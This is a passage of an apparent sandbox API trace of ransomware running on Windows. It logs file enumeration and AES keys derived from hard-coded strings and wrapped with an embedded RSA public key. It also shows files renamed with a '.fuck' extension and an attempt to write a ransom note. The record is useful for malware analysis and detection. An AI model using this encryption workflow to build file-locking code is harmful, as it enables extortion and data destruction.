Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), bFailIfExists=0) returned 0 [0239.697] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", dwFileAttributes=0x0) returned 0 [0239.698] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg")) returned 0 [0239.699] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.fuck")) returned 0 [0239.699] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.699] CryptDestroyKey (hKey=0x28bee98) returned 1 [0239.699] CryptReleaseContext (hProv=0x28d4cd8, dwFlags=0x0) returned 1 [0239.699] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.699] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.699] GetLastError () returned 0x5 [0239.699] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml")) returned 0x20 [0239.699] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0239.700] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.700] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.701] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.701] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d5448) returned 1 [0239.703] CryptCreateHash (in: hProv=0x28d5448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.703] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.703] CryptHashData (hHash=0x28bf1d8, pbData=0x28897e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.703] CryptDeriveKey (in: hProv=0x28d5448, Algid=0x6610, hBaseData=0x28bf1d8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf218) returned 1 [0239.703] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.703] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.704] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d4ef8) returned 1 [0239.704] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4ef8, dwCertEncodingType=0x1, pInfo=0x28c93f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9428*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9430*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bee98) returned 1 [0239.704] CryptEncrypt (in: hKey=0x28bee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.704] CryptEncrypt (in: hKey=0x28bee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5118*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5118*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.704] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5118, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.704] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.704] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.705] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.705] CloseHandle (hObject=0xffffffff) returned 1 [0239.705] CloseHandle (hObject=0xffffffff) returned 1 [0239.705] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), bFailIfExists=0) returned 0 [0239.705] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", dwFileAttributes=0x0) returned 0 [0239.706] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg")) returned 0 [0239.706] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.fuck")) returned 0 [0239.706] CryptDestroyHash (hHash=0x28bf1d8) returned 1 [0239.706] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.706] CryptReleaseContext (hProv=0x28d5448, dwFlags=0x0) returned 1 [0239.707] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.707] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.707] GetLastError () returned 0x5 [0239.707] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico")) returned 0x20 [0239.707] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", dwFileAttributes=0x80) returned 0 [0239.707] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.708] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.708] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.708] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d5910) returned 1 [0239.710] CryptCreateHash (in: hProv=0x28d5910, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.710] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.710] CryptHashData (hHash=0x28bf018, pbData=0x2889970, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.710] CryptDeriveKey (in: hProv=0x28d5910, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf218) returned 1 [0239.710] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.710] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.710] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d4de8) returned 1 [0239.711] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4de8, dwCertEncodingType=0x1, pInfo=0x28c9b48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9b78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9b80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be298) returned 1 [0239.711] CryptEncrypt (in: hKey=0x28be298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.711] CryptEncrypt (in: hKey=0x28be298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5448*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5448*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.711] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5448, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.711] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.711] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.711] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.711] CloseHandle (hObject=0xffffffff) returned 1 [0239.711] CloseHandle (hObject=0xffffffff) returned 1 [0239.711] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), bFailIfExists=0) returned 0 [0239.712] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", dwFileAttributes=0x0) returned 0 [0239.712] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg")) returned 0 [0239.712] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.fuck")) returned 0 [0239.713] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.713] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.713] CryptReleaseContext (hProv=0x28d5910, dwFlags=0x0) returned 1 [0239.713] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.713] FindClose (in: hFindFile=0x28bee58 | out: hFindFile=0x28bee58) returned 1 [0239.713] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\readme_back_files.htm")) returned 0xffffffff [0239.713] AreFileApisANSI () returned 1 [0239.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0239.713] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.714] GetLastError () returned 0x5 [0239.714] GetLastError () returned 0x5 [0239.714] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.714] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bee58 [0239.715] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.715] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.715] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bf1d8 [0239.715] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.715] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.715] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.715] GetLastError () returned 0x5 [0239.715] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml")) returned 0x20 [0239.716] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0239.716] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.716] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.717] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.717] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d54d0) returned 1 [0239.719] CryptCreateHash (in: hProv=0x28d54d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.719] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.719] CryptHashData (hHash=0x28bf218, pbData=0x2889498, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.719] CryptDeriveKey (in: hProv=0x28d54d0, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be858) returned 1 [0239.720] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.720] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.720] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d5668) returned 1 [0239.720] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5668, dwCertEncodingType=0x1, pInfo=0x28c9f58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9f88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9f90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be758) returned 1 [0239.720] CryptEncrypt (in: hKey=0x28be758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.720] CryptEncrypt (in: hKey=0x28be758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4e70*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d4e70*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.720] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4e70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.721] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28d9aa8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.721] CryptEncrypt (in: hKey=0x28be858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d9aa8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.721] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.721] CloseHandle (hObject=0xffffffff) returned 1 [0239.721] CloseHandle (hObject=0xffffffff) returned 1 [0239.721] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), bFailIfExists=0) returned 0 [0239.721] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x0) returned 0 [0239.722] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.gsg")) returned 0 [0239.722] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device 